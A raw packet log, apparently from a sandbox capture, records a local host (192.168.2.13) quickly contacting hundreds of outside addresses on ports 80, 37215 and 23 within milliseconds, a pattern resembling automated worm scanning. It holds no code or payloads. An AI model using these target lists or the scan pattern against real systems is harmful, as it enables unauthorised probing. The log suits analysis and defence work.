                            Jun 10, 2024 15:37:59.477226973 CEST3040137215192.168.2.13156.41.151.47
                            Jun 10, 2024 15:37:59.477233887 CEST80168334.177.12.33192.168.2.13
                            Jun 10, 2024 15:37:59.477246046 CEST3721530401197.214.107.135192.168.2.13
                            Jun 10, 2024 15:37:59.477246046 CEST1683380192.168.2.13200.10.68.151
                            Jun 10, 2024 15:37:59.477257013 CEST3721530401156.228.162.31192.168.2.13
                            Jun 10, 2024 15:37:59.477264881 CEST1683380192.168.2.1373.47.8.22
                            Jun 10, 2024 15:37:59.477266073 CEST1683380192.168.2.134.177.12.33
                            Jun 10, 2024 15:37:59.477269888 CEST8016833115.76.119.216192.168.2.13
                            Jun 10, 2024 15:37:59.477281094 CEST3040137215192.168.2.13197.214.107.135
                            Jun 10, 2024 15:37:59.477283001 CEST3721530401156.150.116.27192.168.2.13
                            Jun 10, 2024 15:37:59.477292061 CEST3040137215192.168.2.13156.228.162.31
                            Jun 10, 2024 15:37:59.477298021 CEST1683380192.168.2.13115.76.119.216
                            Jun 10, 2024 15:37:59.477314949 CEST3040137215192.168.2.13156.150.116.27
                            Jun 10, 2024 15:37:59.477348089 CEST5532237215192.168.2.1341.112.237.34
                            Jun 10, 2024 15:37:59.477585077 CEST8016833190.249.228.211192.168.2.13
                            Jun 10, 2024 15:37:59.477623940 CEST1683380192.168.2.13190.249.228.211
                            Jun 10, 2024 15:37:59.477673054 CEST372153040141.241.132.208192.168.2.13
                            Jun 10, 2024 15:37:59.477686882 CEST8016833136.239.128.138192.168.2.13
                            Jun 10, 2024 15:37:59.477699041 CEST801683312.159.233.53192.168.2.13
                            Jun 10, 2024 15:37:59.477710962 CEST3721530401156.60.84.41192.168.2.13
                            Jun 10, 2024 15:37:59.477722883 CEST3721530401156.99.48.187192.168.2.13
                            Jun 10, 2024 15:37:59.477722883 CEST3040137215192.168.2.1341.241.132.208
                            Jun 10, 2024 15:37:59.477722883 CEST1683380192.168.2.13136.239.128.138
                            Jun 10, 2024 15:37:59.477731943 CEST1683380192.168.2.1312.159.233.53
                            Jun 10, 2024 15:37:59.477735996 CEST8016833168.33.90.154192.168.2.13
                            Jun 10, 2024 15:37:59.477751017 CEST8016833122.141.63.206192.168.2.13
                            Jun 10, 2024 15:37:59.477756977 CEST3040137215192.168.2.13156.60.84.41
                            Jun 10, 2024 15:37:59.477762938 CEST372153040141.205.158.36192.168.2.13
                            Jun 10, 2024 15:37:59.477766991 CEST1683380192.168.2.13168.33.90.154
                            Jun 10, 2024 15:37:59.477771044 CEST3040137215192.168.2.13156.99.48.187
                            Jun 10, 2024 15:37:59.477776051 CEST8016833110.121.243.73192.168.2.13
                            Jun 10, 2024 15:37:59.477788925 CEST8016833137.247.210.119192.168.2.13
                            Jun 10, 2024 15:37:59.477792025 CEST1683380192.168.2.13122.141.63.206
                            Jun 10, 2024 15:37:59.477792978 CEST3040137215192.168.2.1341.205.158.36
                            Jun 10, 2024 15:37:59.477802992 CEST8016833150.198.208.221192.168.2.13
                            Jun 10, 2024 15:37:59.477807045 CEST1683380192.168.2.13110.121.243.73
                            Jun 10, 2024 15:37:59.477814913 CEST8016833119.121.108.109192.168.2.13
                            Jun 10, 2024 15:37:59.477828026 CEST8016833205.60.129.238192.168.2.13
                            Jun 10, 2024 15:37:59.477833986 CEST1683380192.168.2.13137.247.210.119
                            Jun 10, 2024 15:37:59.477833986 CEST1683380192.168.2.13150.198.208.221
                            Jun 10, 2024 15:37:59.477838993 CEST1683380192.168.2.13119.121.108.109
                            Jun 10, 2024 15:37:59.477839947 CEST3721530401197.204.146.228192.168.2.13
                            Jun 10, 2024 15:37:59.477854013 CEST8016833193.53.157.120192.168.2.13
                            Jun 10, 2024 15:37:59.477864981 CEST801683345.28.167.223192.168.2.13
                            Jun 10, 2024 15:37:59.477874994 CEST3040137215192.168.2.13197.204.146.228
                            Jun 10, 2024 15:37:59.477875948 CEST801683352.4.8.154192.168.2.13
                            Jun 10, 2024 15:37:59.477888107 CEST1683380192.168.2.13193.53.157.120
                            Jun 10, 2024 15:37:59.477888107 CEST8016833136.68.208.56192.168.2.13
                            Jun 10, 2024 15:37:59.477900028 CEST1683380192.168.2.1345.28.167.223
                            Jun 10, 2024 15:37:59.477900982 CEST3721530401197.1.252.144192.168.2.13
                            Jun 10, 2024 15:37:59.477909088 CEST1683380192.168.2.1352.4.8.154
                            Jun 10, 2024 15:37:59.477914095 CEST8016833202.118.99.239192.168.2.13
                            Jun 10, 2024 15:37:59.477921963 CEST1683380192.168.2.13136.68.208.56
                            Jun 10, 2024 15:37:59.477926970 CEST3040137215192.168.2.13197.1.252.144
                            Jun 10, 2024 15:37:59.477936983 CEST801683389.252.202.124192.168.2.13
                            Jun 10, 2024 15:37:59.477938890 CEST1683380192.168.2.13205.60.129.238
                            Jun 10, 2024 15:37:59.477947950 CEST1683380192.168.2.13202.118.99.239
                            Jun 10, 2024 15:37:59.477948904 CEST801683312.16.153.3192.168.2.13
                            Jun 10, 2024 15:37:59.477962971 CEST3721530401156.51.21.135192.168.2.13
                            Jun 10, 2024 15:37:59.477974892 CEST8016833218.133.20.173192.168.2.13
                            Jun 10, 2024 15:37:59.477976084 CEST1683380192.168.2.1389.252.202.124
                            Jun 10, 2024 15:37:59.477986097 CEST1683380192.168.2.1312.16.153.3
                            Jun 10, 2024 15:37:59.477987051 CEST3721530401197.101.97.78192.168.2.13
                            Jun 10, 2024 15:37:59.477993965 CEST3040137215192.168.2.13156.51.21.135
                            Jun 10, 2024 15:37:59.477998972 CEST8016833188.31.225.56192.168.2.13
                            Jun 10, 2024 15:37:59.478009939 CEST1683380192.168.2.13218.133.20.173
                            Jun 10, 2024 15:37:59.478012085 CEST372153040141.39.68.93192.168.2.13
                            Jun 10, 2024 15:37:59.478035927 CEST3040137215192.168.2.13197.101.97.78
                            Jun 10, 2024 15:37:59.478035927 CEST1683380192.168.2.13188.31.225.56
                            Jun 10, 2024 15:37:59.478050947 CEST3040137215192.168.2.1341.39.68.93
                            Jun 10, 2024 15:37:59.478374958 CEST3721530401197.170.222.21192.168.2.13
                            Jun 10, 2024 15:37:59.478389025 CEST8016833111.175.70.96192.168.2.13
                            Jun 10, 2024 15:37:59.478400946 CEST8016833187.133.240.97192.168.2.13
                            Jun 10, 2024 15:37:59.478415012 CEST3040137215192.168.2.13197.170.222.21
                            Jun 10, 2024 15:37:59.478415012 CEST1683380192.168.2.13111.175.70.96
                            Jun 10, 2024 15:37:59.478425980 CEST372153040141.196.206.160192.168.2.13
                            Jun 10, 2024 15:37:59.478430033 CEST1683380192.168.2.13187.133.240.97
                            Jun 10, 2024 15:37:59.478437901 CEST8016833167.35.93.166192.168.2.13
                            Jun 10, 2024 15:37:59.478450060 CEST8016833149.5.31.6192.168.2.13
                            Jun 10, 2024 15:37:59.478461981 CEST801683368.123.168.234192.168.2.13
                            Jun 10, 2024 15:37:59.478466988 CEST3040137215192.168.2.1341.196.206.160
                            Jun 10, 2024 15:37:59.478466988 CEST1683380192.168.2.13167.35.93.166
                            Jun 10, 2024 15:37:59.478473902 CEST8016833220.210.245.203192.168.2.13
                            Jun 10, 2024 15:37:59.478482008 CEST1683380192.168.2.13149.5.31.6
                            Jun 10, 2024 15:37:59.478486061 CEST8016833143.158.42.9192.168.2.13
                            Jun 10, 2024 15:37:59.478497982 CEST8016833170.184.94.59192.168.2.13
                            Jun 10, 2024 15:37:59.478499889 CEST1683380192.168.2.1368.123.168.234
                            Jun 10, 2024 15:37:59.478509903 CEST8016833195.209.166.102192.168.2.13
                            Jun 10, 2024 15:37:59.478513002 CEST1683380192.168.2.13220.210.245.203
                            Jun 10, 2024 15:37:59.478516102 CEST1683380192.168.2.13143.158.42.9
                            Jun 10, 2024 15:37:59.478522062 CEST8016833139.123.232.75192.168.2.13
                            Jun 10, 2024 15:37:59.478533983 CEST8016833200.13.68.164192.168.2.13
                            Jun 10, 2024 15:37:59.478538036 CEST1683380192.168.2.13170.184.94.59
                            Jun 10, 2024 15:37:59.478545904 CEST801683313.46.58.152192.168.2.13
                            Jun 10, 2024 15:37:59.478549957 CEST1683380192.168.2.13195.209.166.102
                            Jun 10, 2024 15:37:59.478557110 CEST801683337.138.35.29192.168.2.13
                            Jun 10, 2024 15:37:59.478558064 CEST1683380192.168.2.13139.123.232.75
                            Jun 10, 2024 15:37:59.478566885 CEST1683380192.168.2.13200.13.68.164
                            Jun 10, 2024 15:37:59.478569031 CEST8016833193.229.222.52192.168.2.13
                            Jun 10, 2024 15:37:59.478576899 CEST1683380192.168.2.1313.46.58.152
                            Jun 10, 2024 15:37:59.478581905 CEST8016833105.67.101.77192.168.2.13
                            Jun 10, 2024 15:37:59.478591919 CEST1683380192.168.2.1337.138.35.29
                            Jun 10, 2024 15:37:59.478595018 CEST8016833185.189.13.33192.168.2.13
                            Jun 10, 2024 15:37:59.478606939 CEST801683345.132.197.239192.168.2.13
                            Jun 10, 2024 15:37:59.478615046 CEST1683380192.168.2.13193.229.222.52
                            Jun 10, 2024 15:37:59.478615046 CEST1683380192.168.2.13105.67.101.77
                            Jun 10, 2024 15:37:59.478619099 CEST8016833145.246.236.195192.168.2.13
                            Jun 10, 2024 15:37:59.478630066 CEST1683380192.168.2.13185.189.13.33
                            Jun 10, 2024 15:37:59.478631973 CEST801683385.237.4.11192.168.2.13
                            Jun 10, 2024 15:37:59.478643894 CEST801683367.54.111.130192.168.2.13
                            Jun 10, 2024 15:37:59.478656054 CEST801683360.141.204.161192.168.2.13
                            Jun 10, 2024 15:37:59.478666067 CEST1683380192.168.2.13145.246.236.195
                            Jun 10, 2024 15:37:59.478667974 CEST8016833185.201.148.124192.168.2.13
                            Jun 10, 2024 15:37:59.478667974 CEST1683380192.168.2.1385.237.4.11
                            Jun 10, 2024 15:37:59.478678942 CEST801683327.36.57.141192.168.2.13
                            Jun 10, 2024 15:37:59.478682995 CEST1683380192.168.2.1367.54.111.130
                            Jun 10, 2024 15:37:59.478688955 CEST1683380192.168.2.1360.141.204.161
                            Jun 10, 2024 15:37:59.478693008 CEST801683319.61.0.191192.168.2.13
                            Jun 10, 2024 15:37:59.478697062 CEST1683380192.168.2.1345.132.197.239
                            Jun 10, 2024 15:37:59.478705883 CEST1683380192.168.2.13185.201.148.124
                            Jun 10, 2024 15:37:59.478708029 CEST8016833145.158.147.176192.168.2.13
                            Jun 10, 2024 15:37:59.478714943 CEST1683380192.168.2.1327.36.57.141
                            Jun 10, 2024 15:37:59.478725910 CEST1683380192.168.2.1319.61.0.191
                            Jun 10, 2024 15:37:59.478744984 CEST1683380192.168.2.13145.158.147.176
                            Jun 10, 2024 15:37:59.478939056 CEST8016833195.107.225.20192.168.2.13
                            Jun 10, 2024 15:37:59.478979111 CEST1683380192.168.2.13195.107.225.20
                            Jun 10, 2024 15:37:59.478979111 CEST801683393.28.174.184192.168.2.13
                            Jun 10, 2024 15:37:59.478991985 CEST8016833129.245.96.99192.168.2.13
                            Jun 10, 2024 15:37:59.479002953 CEST801683396.47.167.143192.168.2.13
                            Jun 10, 2024 15:37:59.479020119 CEST1683380192.168.2.13129.245.96.99
                            Jun 10, 2024 15:37:59.479024887 CEST1683380192.168.2.1393.28.174.184
                            Jun 10, 2024 15:37:59.479027987 CEST801683367.103.134.69192.168.2.13
                            Jun 10, 2024 15:37:59.479031086 CEST1683380192.168.2.1396.47.167.143
                            Jun 10, 2024 15:37:59.479041100 CEST801683314.147.134.96192.168.2.13
                            Jun 10, 2024 15:37:59.479053974 CEST801683325.46.65.164192.168.2.13
                            Jun 10, 2024 15:37:59.479065895 CEST8016833206.156.252.217192.168.2.13
                            Jun 10, 2024 15:37:59.479069948 CEST1683380192.168.2.1367.103.134.69
                            Jun 10, 2024 15:37:59.479078054 CEST8016833133.209.160.98192.168.2.13
                            Jun 10, 2024 15:37:59.479079962 CEST1683380192.168.2.1314.147.134.96
                            Jun 10, 2024 15:37:59.479091883 CEST1683380192.168.2.1325.46.65.164
                            Jun 10, 2024 15:37:59.479100943 CEST8016833150.220.247.133192.168.2.13
                            Jun 10, 2024 15:37:59.479100943 CEST1683380192.168.2.13206.156.252.217
                            Jun 10, 2024 15:37:59.479100943 CEST1683380192.168.2.13133.209.160.98
                            Jun 10, 2024 15:37:59.479113102 CEST801683332.31.161.134192.168.2.13
                            Jun 10, 2024 15:37:59.479125023 CEST801683340.191.244.165192.168.2.13
                            Jun 10, 2024 15:37:59.479136944 CEST8016833149.248.180.238192.168.2.13
                            Jun 10, 2024 15:37:59.479140043 CEST1683380192.168.2.13150.220.247.133
                            Jun 10, 2024 15:37:59.479146957 CEST1683380192.168.2.1332.31.161.134
                            Jun 10, 2024 15:37:59.479149103 CEST8016833202.161.76.210192.168.2.13
                            Jun 10, 2024 15:37:59.479161024 CEST1683380192.168.2.1340.191.244.165
                            Jun 10, 2024 15:37:59.479161024 CEST8016833134.136.54.170192.168.2.13
                            Jun 10, 2024 15:37:59.479168892 CEST1683380192.168.2.13149.248.180.238
                            Jun 10, 2024 15:37:59.479173899 CEST801683319.202.16.197192.168.2.13
                            Jun 10, 2024 15:37:59.479187012 CEST1683380192.168.2.13202.161.76.210
                            Jun 10, 2024 15:37:59.479198933 CEST8016833109.25.76.69192.168.2.13
                            Jun 10, 2024 15:37:59.479202032 CEST1683380192.168.2.1319.202.16.197
                            Jun 10, 2024 15:37:59.479211092 CEST8016833175.137.72.95192.168.2.13
                            Jun 10, 2024 15:37:59.479216099 CEST1683380192.168.2.13134.136.54.170
                            Jun 10, 2024 15:37:59.479223013 CEST801683383.245.86.39192.168.2.13
                            Jun 10, 2024 15:37:59.479235888 CEST8016833211.33.128.124192.168.2.13
                            Jun 10, 2024 15:37:59.479237080 CEST1683380192.168.2.13109.25.76.69
                            Jun 10, 2024 15:37:59.479237080 CEST1683380192.168.2.13175.137.72.95
                            Jun 10, 2024 15:37:59.479248047 CEST801683362.195.162.78192.168.2.13
                            Jun 10, 2024 15:37:59.479259968 CEST801683359.154.149.162192.168.2.13
                            Jun 10, 2024 15:37:59.479268074 CEST1683380192.168.2.13211.33.128.124
                            Jun 10, 2024 15:37:59.479271889 CEST8016833195.129.99.188192.168.2.13
                            Jun 10, 2024 15:37:59.479283094 CEST1683380192.168.2.1383.245.86.39
                            Jun 10, 2024 15:37:59.479284048 CEST801683369.65.43.112192.168.2.13
                            Jun 10, 2024 15:37:59.479285002 CEST1683380192.168.2.1362.195.162.78
                            Jun 10, 2024 15:37:59.479296923 CEST8016833119.150.13.86192.168.2.13
                            Jun 10, 2024 15:37:59.479300976 CEST1683380192.168.2.1359.154.149.162
                            Jun 10, 2024 15:37:59.479310036 CEST8016833135.73.80.130192.168.2.13
                            Jun 10, 2024 15:37:59.479310989 CEST1683380192.168.2.13195.129.99.188
                            Jun 10, 2024 15:37:59.479310989 CEST1683380192.168.2.1369.65.43.112
                            Jun 10, 2024 15:37:59.479322910 CEST801683369.52.6.77192.168.2.13
                            Jun 10, 2024 15:37:59.479335070 CEST1683380192.168.2.13119.150.13.86
                            Jun 10, 2024 15:37:59.479352951 CEST1683380192.168.2.13135.73.80.130
                            Jun 10, 2024 15:37:59.479363918 CEST1683380192.168.2.1369.52.6.77
                            Jun 10, 2024 15:37:59.479480982 CEST4124023192.168.2.1387.202.96.40
                            Jun 10, 2024 15:37:59.479871035 CEST8016833130.165.35.95192.168.2.13
                            Jun 10, 2024 15:37:59.479907990 CEST1683380192.168.2.13130.165.35.95
                            Jun 10, 2024 15:37:59.479927063 CEST8016833152.91.41.178192.168.2.13
                            Jun 10, 2024 15:37:59.479939938 CEST8016833126.167.27.130192.168.2.13
                            Jun 10, 2024 15:37:59.479964972 CEST801683378.127.178.88192.168.2.13
                            Jun 10, 2024 15:37:59.479968071 CEST1683380192.168.2.13152.91.41.178
                            Jun 10, 2024 15:37:59.479975939 CEST1683380192.168.2.13126.167.27.130
                            Jun 10, 2024 15:37:59.479976892 CEST8016833218.22.70.180192.168.2.13
                            Jun 10, 2024 15:37:59.479990005 CEST8016833111.18.225.167192.168.2.13
                            Jun 10, 2024 15:37:59.480001926 CEST801683379.91.159.108192.168.2.13
                            Jun 10, 2024 15:37:59.480003119 CEST1683380192.168.2.1378.127.178.88
                            Jun 10, 2024 15:37:59.480011940 CEST1683380192.168.2.13218.22.70.180
                            Jun 10, 2024 15:37:59.480015039 CEST801683324.158.108.212192.168.2.13
                            Jun 10, 2024 15:37:59.480017900 CEST1683380192.168.2.13111.18.225.167
                            Jun 10, 2024 15:37:59.480026960 CEST801683365.135.101.241192.168.2.13
                            Jun 10, 2024 15:37:59.480030060 CEST1683380192.168.2.1379.91.159.108
                            Jun 10, 2024 15:37:59.480040073 CEST1683380192.168.2.1324.158.108.212
                            Jun 10, 2024 15:37:59.480041027 CEST801683392.112.68.182192.168.2.13
                            Jun 10, 2024 15:37:59.480055094 CEST1683380192.168.2.1365.135.101.241
                            Jun 10, 2024 15:37:59.480066061 CEST8016833125.87.206.187192.168.2.13
                            Jun 10, 2024 15:37:59.480072975 CEST1683380192.168.2.1392.112.68.182
                            Jun 10, 2024 15:37:59.480077982 CEST801683327.253.32.109192.168.2.13
                            Jun 10, 2024 15:37:59.480091095 CEST8016833151.51.155.169192.168.2.13
                            Jun 10, 2024 15:37:59.480097055 CEST1683380192.168.2.13125.87.206.187
                            Jun 10, 2024 15:37:59.480103970 CEST8016833199.58.57.213192.168.2.13
                            Jun 10, 2024 15:37:59.480110884 CEST1683380192.168.2.1327.253.32.109
                            Jun 10, 2024 15:37:59.480117083 CEST8016833174.45.110.205192.168.2.13
                            Jun 10, 2024 15:37:59.480128050 CEST1683380192.168.2.13151.51.155.169
                            Jun 10, 2024 15:37:59.480129004 CEST8016833186.123.137.166192.168.2.13
                            Jun 10, 2024 15:37:59.480134010 CEST1683380192.168.2.13199.58.57.213
                            Jun 10, 2024 15:37:59.480140924 CEST8016833168.224.51.139192.168.2.13
                            Jun 10, 2024 15:37:59.480153084 CEST801683390.156.239.9192.168.2.13
                            Jun 10, 2024 15:37:59.480161905 CEST3567480192.168.2.13151.218.172.48
                            Jun 10, 2024 15:37:59.480165958 CEST801683396.69.164.9192.168.2.13
                            Jun 10, 2024 15:37:59.480189085 CEST1683380192.168.2.1390.156.239.9
                            Jun 10, 2024 15:37:59.480190039 CEST801683323.12.175.138192.168.2.13
                            Jun 10, 2024 15:37:59.480197906 CEST1683380192.168.2.1396.69.164.9
                            Jun 10, 2024 15:37:59.480202913 CEST801683344.52.20.204192.168.2.13
                            Jun 10, 2024 15:37:59.480207920 CEST1683380192.168.2.13174.45.110.205
                            Jun 10, 2024 15:37:59.480218887 CEST801683394.141.44.123192.168.2.13
                            Jun 10, 2024 15:37:59.480221033 CEST1683380192.168.2.13186.123.137.166
                            Jun 10, 2024 15:37:59.480221033 CEST1683380192.168.2.13168.224.51.139
                            Jun 10, 2024 15:37:59.480228901 CEST1683380192.168.2.1323.12.175.138
                            Jun 10, 2024 15:37:59.480231047 CEST8016833219.221.51.118192.168.2.13
                            Jun 10, 2024 15:37:59.480243921 CEST1683380192.168.2.1344.52.20.204
                            Jun 10, 2024 15:37:59.480243921 CEST80168334.1.20.45192.168.2.13
                            Jun 10, 2024 15:37:59.480243921 CEST1683380192.168.2.1394.141.44.123
                            Jun 10, 2024 15:37:59.480257988 CEST8016833153.13.7.19192.168.2.13
                            Jun 10, 2024 15:37:59.480268955 CEST8016833106.255.159.85192.168.2.13
                            Jun 10, 2024 15:37:59.480276108 CEST1683380192.168.2.134.1.20.45
                            Jun 10, 2024 15:37:59.480282068 CEST801683350.30.113.10192.168.2.13
                            Jun 10, 2024 15:37:59.480285883 CEST1683380192.168.2.13153.13.7.19
                            Jun 10, 2024 15:37:59.480293036 CEST801683382.116.175.35192.168.2.13
                            Jun 10, 2024 15:37:59.480300903 CEST1683380192.168.2.13106.255.159.85
                            Jun 10, 2024 15:37:59.480317116 CEST1683380192.168.2.13219.221.51.118
                            Jun 10, 2024 15:37:59.480317116 CEST1683380192.168.2.1350.30.113.10
                            Jun 10, 2024 15:37:59.480386972 CEST1683380192.168.2.1382.116.175.35
                            Jun 10, 2024 15:37:59.480870962 CEST8016833183.115.2.239192.168.2.13
                            Jun 10, 2024 15:37:59.480892897 CEST8016833129.2.75.114192.168.2.13
                            Jun 10, 2024 15:37:59.480906010 CEST8016833154.72.156.155192.168.2.13
                            Jun 10, 2024 15:37:59.480906963 CEST1683380192.168.2.13183.115.2.239
                            Jun 10, 2024 15:37:59.480927944 CEST1683380192.168.2.13129.2.75.114
                            Jun 10, 2024 15:37:59.480941057 CEST801683338.172.242.203192.168.2.13
                            Jun 10, 2024 15:37:59.480945110 CEST1683380192.168.2.13154.72.156.155
                            Jun 10, 2024 15:37:59.480952978 CEST8016833185.145.134.206192.168.2.13
                            Jun 10, 2024 15:37:59.480964899 CEST801683335.15.134.94192.168.2.13
                            Jun 10, 2024 15:37:59.480978012 CEST8016833200.15.230.45192.168.2.13
                            Jun 10, 2024 15:37:59.480983973 CEST1683380192.168.2.13185.145.134.206
                            Jun 10, 2024 15:37:59.480983973 CEST1683380192.168.2.1338.172.242.203
                            Jun 10, 2024 15:37:59.480993986 CEST1683380192.168.2.1335.15.134.94
                            Jun 10, 2024 15:37:59.481000900 CEST8016833139.157.240.58192.168.2.13
                            Jun 10, 2024 15:37:59.481014967 CEST8016833209.235.71.46192.168.2.13
                            Jun 10, 2024 15:37:59.481019020 CEST1683380192.168.2.13200.15.230.45
                            Jun 10, 2024 15:37:59.481026888 CEST8016833120.212.87.220192.168.2.13
                            Jun 10, 2024 15:37:59.481034994 CEST1683380192.168.2.13139.157.240.58
                            Jun 10, 2024 15:37:59.481043100 CEST801683399.142.29.116192.168.2.13
                            Jun 10, 2024 15:37:59.481053114 CEST1683380192.168.2.13209.235.71.46
                            Jun 10, 2024 15:37:59.481055975 CEST1683380192.168.2.13120.212.87.220
                            Jun 10, 2024 15:37:59.481076956 CEST1683380192.168.2.1399.142.29.116
                            Jun 10, 2024 15:37:59.481110096 CEST801683350.80.156.250192.168.2.13
                            Jun 10, 2024 15:37:59.481123924 CEST801683360.252.150.82192.168.2.13
                            Jun 10, 2024 15:37:59.481134892 CEST8016833113.115.78.135192.168.2.13
                            Jun 10, 2024 15:37:59.481147051 CEST8016833169.184.154.168192.168.2.13
                            Jun 10, 2024 15:37:59.481149912 CEST1683380192.168.2.1350.80.156.250
                            Jun 10, 2024 15:37:59.481159925 CEST1683380192.168.2.1360.252.150.82
                            Jun 10, 2024 15:37:59.481169939 CEST8016833129.147.11.149192.168.2.13
                            Jun 10, 2024 15:37:59.481173992 CEST1683380192.168.2.13169.184.154.168
                            Jun 10, 2024 15:37:59.481183052 CEST801683342.129.181.220192.168.2.13
                            Jun 10, 2024 15:37:59.481194973 CEST801683373.194.125.69192.168.2.13
                            Jun 10, 2024 15:37:59.481204987 CEST1683380192.168.2.13129.147.11.149
                            Jun 10, 2024 15:37:59.481209993 CEST801683373.204.138.214192.168.2.13
                            Jun 10, 2024 15:37:59.481213093 CEST1683380192.168.2.1342.129.181.220
                            Jun 10, 2024 15:37:59.481230974 CEST1683380192.168.2.1373.194.125.69
                            Jun 10, 2024 15:37:59.481358051 CEST1683380192.168.2.1373.204.138.214
                            Jun 10, 2024 15:37:59.481364012 CEST1683380192.168.2.13113.115.78.135
                            Jun 10, 2024 15:37:59.481513023 CEST80168339.173.218.89192.168.2.13
                            Jun 10, 2024 15:37:59.481550932 CEST1683380192.168.2.139.173.218.89
                            Jun 10, 2024 15:37:59.482135057 CEST801683313.132.235.227192.168.2.13
                            Jun 10, 2024 15:37:59.482148886 CEST8016833191.51.130.179192.168.2.13
                            Jun 10, 2024 15:37:59.482161999 CEST8016833116.160.201.46192.168.2.13
                            Jun 10, 2024 15:37:59.482182026 CEST1683380192.168.2.1313.132.235.227
                            Jun 10, 2024 15:37:59.482182026 CEST1683380192.168.2.13191.51.130.179
                            Jun 10, 2024 15:37:59.482183933 CEST8016833148.132.124.60192.168.2.13
                            Jun 10, 2024 15:37:59.482194901 CEST1683380192.168.2.13116.160.201.46
                            Jun 10, 2024 15:37:59.482197046 CEST801683389.40.7.133192.168.2.13
                            Jun 10, 2024 15:37:59.482208967 CEST8016833211.12.222.68192.168.2.13
                            Jun 10, 2024 15:37:59.482218981 CEST1683380192.168.2.13148.132.124.60
                            Jun 10, 2024 15:37:59.482237101 CEST1683380192.168.2.1389.40.7.133
                            Jun 10, 2024 15:37:59.482239962 CEST1683380192.168.2.13211.12.222.68
                            Jun 10, 2024 15:37:59.482239962 CEST80168335.39.84.242192.168.2.13
                            Jun 10, 2024 15:37:59.482254028 CEST801683334.159.157.242192.168.2.13
                            Jun 10, 2024 15:37:59.482275009 CEST1683380192.168.2.135.39.84.242
                            Jun 10, 2024 15:37:59.482280970 CEST8016833156.196.95.20192.168.2.13
                            Jun 10, 2024 15:37:59.482281923 CEST1683380192.168.2.1334.159.157.242
                            Jun 10, 2024 15:37:59.482316017 CEST8016833193.32.70.113192.168.2.13
                            Jun 10, 2024 15:37:59.482317924 CEST1683380192.168.2.13156.196.95.20
                            Jun 10, 2024 15:37:59.482328892 CEST8016833154.30.96.185192.168.2.13
                            Jun 10, 2024 15:37:59.482341051 CEST8016833216.53.216.21192.168.2.13
                            Jun 10, 2024 15:37:59.482359886 CEST1683380192.168.2.13193.32.70.113
                            Jun 10, 2024 15:37:59.482364893 CEST1683380192.168.2.13154.30.96.185
                            Jun 10, 2024 15:37:59.482371092 CEST8016833217.83.246.128192.168.2.13
                            Jun 10, 2024 15:37:59.482374907 CEST1683380192.168.2.13216.53.216.21
                            Jun 10, 2024 15:37:59.482384920 CEST8016833102.159.78.3192.168.2.13
                            Jun 10, 2024 15:37:59.482397079 CEST8016833101.95.196.107192.168.2.13
                            Jun 10, 2024 15:37:59.482405901 CEST1683380192.168.2.13217.83.246.128
                            Jun 10, 2024 15:37:59.482410908 CEST8016833165.252.154.242192.168.2.13
                            Jun 10, 2024 15:37:59.482423067 CEST801683342.19.226.167192.168.2.13
                            Jun 10, 2024 15:37:59.482429028 CEST1683380192.168.2.13101.95.196.107
                            Jun 10, 2024 15:37:59.482434988 CEST8016833112.204.34.128192.168.2.13
                            Jun 10, 2024 15:37:59.482438087 CEST1683380192.168.2.13102.159.78.3
                            Jun 10, 2024 15:37:59.482440948 CEST1683380192.168.2.13165.252.154.242
                            Jun 10, 2024 15:37:59.482460022 CEST1683380192.168.2.1342.19.226.167
                            Jun 10, 2024 15:37:59.482466936 CEST1683380192.168.2.13112.204.34.128
                            Jun 10, 2024 15:37:59.482489109 CEST6047037215192.168.2.13156.57.11.197
                            Jun 10, 2024 15:37:59.483059883 CEST801683386.27.244.166192.168.2.13
                            Jun 10, 2024 15:37:59.483073950 CEST8016833185.113.204.23192.168.2.13
                            Jun 10, 2024 15:37:59.483086109 CEST801683353.226.21.23192.168.2.13
                            Jun 10, 2024 15:37:59.483098984 CEST8016833132.2.216.173192.168.2.13
                            Jun 10, 2024 15:37:59.483107090 CEST1683380192.168.2.1386.27.244.166
                            Jun 10, 2024 15:37:59.483109951 CEST1683380192.168.2.13185.113.204.23
                            Jun 10, 2024 15:37:59.483113050 CEST8016833200.173.179.81192.168.2.13
                            Jun 10, 2024 15:37:59.483120918 CEST1683380192.168.2.1353.226.21.23
                            Jun 10, 2024 15:37:59.483125925 CEST801683387.158.85.16192.168.2.13
                            Jun 10, 2024 15:37:59.483133078 CEST1683380192.168.2.13132.2.216.173
                            Jun 10, 2024 15:37:59.483150005 CEST8016833220.224.218.240192.168.2.13
                            Jun 10, 2024 15:37:59.483156919 CEST1683380192.168.2.1387.158.85.16
                            Jun 10, 2024 15:37:59.483163118 CEST801683346.233.144.43192.168.2.13
                            Jun 10, 2024 15:37:59.483169079 CEST1683380192.168.2.13200.173.179.81
                            Jun 10, 2024 15:37:59.483175993 CEST801683340.29.187.73192.168.2.13
                            Jun 10, 2024 15:37:59.483187914 CEST1683380192.168.2.13220.224.218.240
                            Jun 10, 2024 15:37:59.483189106 CEST8016833169.16.92.41192.168.2.13
                            Jun 10, 2024 15:37:59.483201981 CEST801683353.112.29.63192.168.2.13
                            Jun 10, 2024 15:37:59.483201981 CEST1683380192.168.2.1340.29.187.73
                            Jun 10, 2024 15:37:59.483205080 CEST1683380192.168.2.1346.233.144.43
                            Jun 10, 2024 15:37:59.483215094 CEST801683399.136.93.237192.168.2.13
                            Jun 10, 2024 15:37:59.483227968 CEST8016833197.31.214.208192.168.2.13
                            Jun 10, 2024 15:37:59.483230114 CEST1683380192.168.2.13169.16.92.41
                            Jun 10, 2024 15:37:59.483239889 CEST801683364.70.176.50192.168.2.13
                            Jun 10, 2024 15:37:59.483247995 CEST1683380192.168.2.1353.112.29.63
                            Jun 10, 2024 15:37:59.483247995 CEST1683380192.168.2.1399.136.93.237
                            Jun 10, 2024 15:37:59.483252048 CEST8016833206.79.118.21192.168.2.13
                            Jun 10, 2024 15:37:59.483264923 CEST1683380192.168.2.13197.31.214.208
                            Jun 10, 2024 15:37:59.483267069 CEST8016833220.246.69.227192.168.2.13
                            Jun 10, 2024 15:37:59.483277082 CEST1683380192.168.2.1364.70.176.50
                            Jun 10, 2024 15:37:59.483277082 CEST1683380192.168.2.13206.79.118.21
                            Jun 10, 2024 15:37:59.483308077 CEST1683380192.168.2.13220.246.69.227
                            Jun 10, 2024 15:37:59.483326912 CEST8016833156.154.77.178192.168.2.13
                            Jun 10, 2024 15:37:59.483340025 CEST8016833181.157.220.148192.168.2.13
                            Jun 10, 2024 15:37:59.483351946 CEST8016833115.133.55.129192.168.2.13
                            Jun 10, 2024 15:37:59.483361959 CEST1683380192.168.2.13156.154.77.178
